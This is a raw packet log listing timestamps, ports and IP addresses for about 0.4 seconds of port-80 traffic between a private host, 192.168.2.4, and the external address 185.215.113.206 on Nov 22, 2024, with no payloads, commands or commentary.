Nov 22, 2024 20:35:27.188649893 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.188688993 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.189506054 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.189564943 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.189596891 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.189640999 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.190438032 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.190486908 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.190550089 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.190593004 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.191351891 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.191394091 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.191401958 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.191431999 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.222939014 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.223072052 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.223074913 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.223151922 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.223268032 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.223372936 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.223392010 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.223452091 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.224230051 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.224344015 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.224351883 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.224402905 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.225172997 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.225238085 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.225260019 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.225320101 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.226118088 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.226176023 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.226278067 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.226332903 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.227101088 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.227158070 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.227231026 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.227283001 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.227963924 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.228020906 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.228086948 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.228142977 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.228940010 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.228996038 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.229027987 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.229077101 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.229835033 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.229891062 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.229949951 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.230000973 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.230782986 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.230837107 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.230876923 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.230927944 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.231728077 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.231782913 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.231848955 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.231903076 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.232780933 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.232835054 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.232901096 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.232954025 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.233622074 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.233678102 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.233758926 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.233809948 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.234549999 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.234651089 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.234664917 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.234710932 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.235518932 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.235574961 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.235641956 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.235694885 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.236438036 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.236494064 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.236666918 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.236720085 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.237373114 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.237427950 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.237485886 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.237535954 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.238276958 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.238332987 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.238411903 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.238466024 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.239347935 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.239403009 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.239518881 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.239574909 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.240219116 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.240273952 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.240303993 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.240353107 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.241110086 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.241164923 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.241178036 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.241225958 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.242125988 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.242182970 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.242216110 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.242265940 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.243026018 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.243079901 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.243119955 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.243168116 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.243951082 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.244018078 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.244083881 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.244129896 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.244865894 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.244926929 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.244987965 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.245037079 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.245799065 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.245853901 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.245884895 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.245929956 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.246784925 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.246843100 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.246867895 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.246918917 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.359679937 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.359725952 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.359752893 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.359770060 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.360125065 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.360177040 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.360219955 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.360266924 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.360956907 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.361006975 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.361012936 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.361052990 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.361859083 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.361908913 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.361989021 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.362036943 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.362782955 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.362831116 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.362895966 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.362937927 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.363796949 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.363843918 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.363871098 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.363905907 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.364672899 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.364696026 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.364726067 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.364737988 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.365624905 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.365677118 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.365753889 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.365797997 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.366544962 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.366590023 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.366714954 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.366753101 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.367484093 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.367530107 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.367568016 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.367610931 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.368427038 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.368470907 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.368530035 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.368572950 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.369354963 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.369402885 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.369483948 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.369528055 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.370317936 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.370364904 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.370439053 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.370498896 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.371229887 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.371272087 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.371356010 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.371404886 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.372253895 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.372301102 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.372503042 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.372550011 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.373187065 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.373229980 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.373253107 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.373287916 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.374150991 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.374192953 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.374267101 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.374315977 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.375022888 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.375070095 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.375102043 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.375144005 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.376004934 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.376059055 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.376101017 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.376144886 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.376930952 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.376983881 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.377065897 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.377114058 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.377856016 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.377906084 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.377955914 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.378000975 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.378813982 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.378861904 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.378911972 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.378953934 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.379769087 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.379818916 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.379914045 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.379961967 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.380702019 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.380753040 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.380781889 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.380822897 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.381592035 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.381643057 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.381666899 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.381709099 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.382528067 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.382580996 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.382651091 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.382694006 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.383440971 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.383491039 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.383498907 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.383538008 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.414905071 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.415005922 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.415019035 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.415052891 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.415342093 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.415385008 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.415390968 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.415431023 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.416316986 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.416368008 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.416646957 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.416697979 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.416755915 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.416804075 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.417625904 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.417675018 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.417705059 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.417767048 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.418565035 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.418612957 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.418685913 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.418735027 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.419492960 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.419544935 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.419610977 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.419658899 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.420387030 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.420440912 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.420494080 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.420533895 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.421344042 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.421401024 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.421458006 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.421500921 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.422270060 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.422323942 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.422362089 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.422404051 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.423202991 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.423263073 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.423331022 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.423377037 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.424165964 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.424220085 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.424292088 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.424336910 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.425107002 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.425159931 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.425164938 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.425199986 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.426043034 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.426089048 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.426141977 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.426188946 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.427005053 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.427056074 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.427062988 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.427093029 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.428098917 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.428144932 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.428149939 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.428186893 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.428860903 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.428911924 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.428956032 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.428999901 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.429806948 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.429862976 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.429922104 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.429969072 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.430737019 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.430788994 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.430839062 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.430886030 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.431699991 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.431754112 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.431788921 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.431830883 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.432651997 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.432703018 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.432749987 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.432796955 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.433581114 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.433634996 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.433682919 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.433731079 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.434489965 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.434539080 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.434571028 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.434612989 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.435429096 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.435482025 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.435524940 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.435570002 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.436414957 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.436446905 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.436466932 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.436481953 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.437299967 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.437356949 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.437402964 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.437450886 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.438306093 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.438360929 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.438374043 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.438416004 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.439174891 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.439227104 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.553937912 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.554016113 CET	80	49750	185.215.113.206	192.168.2.4
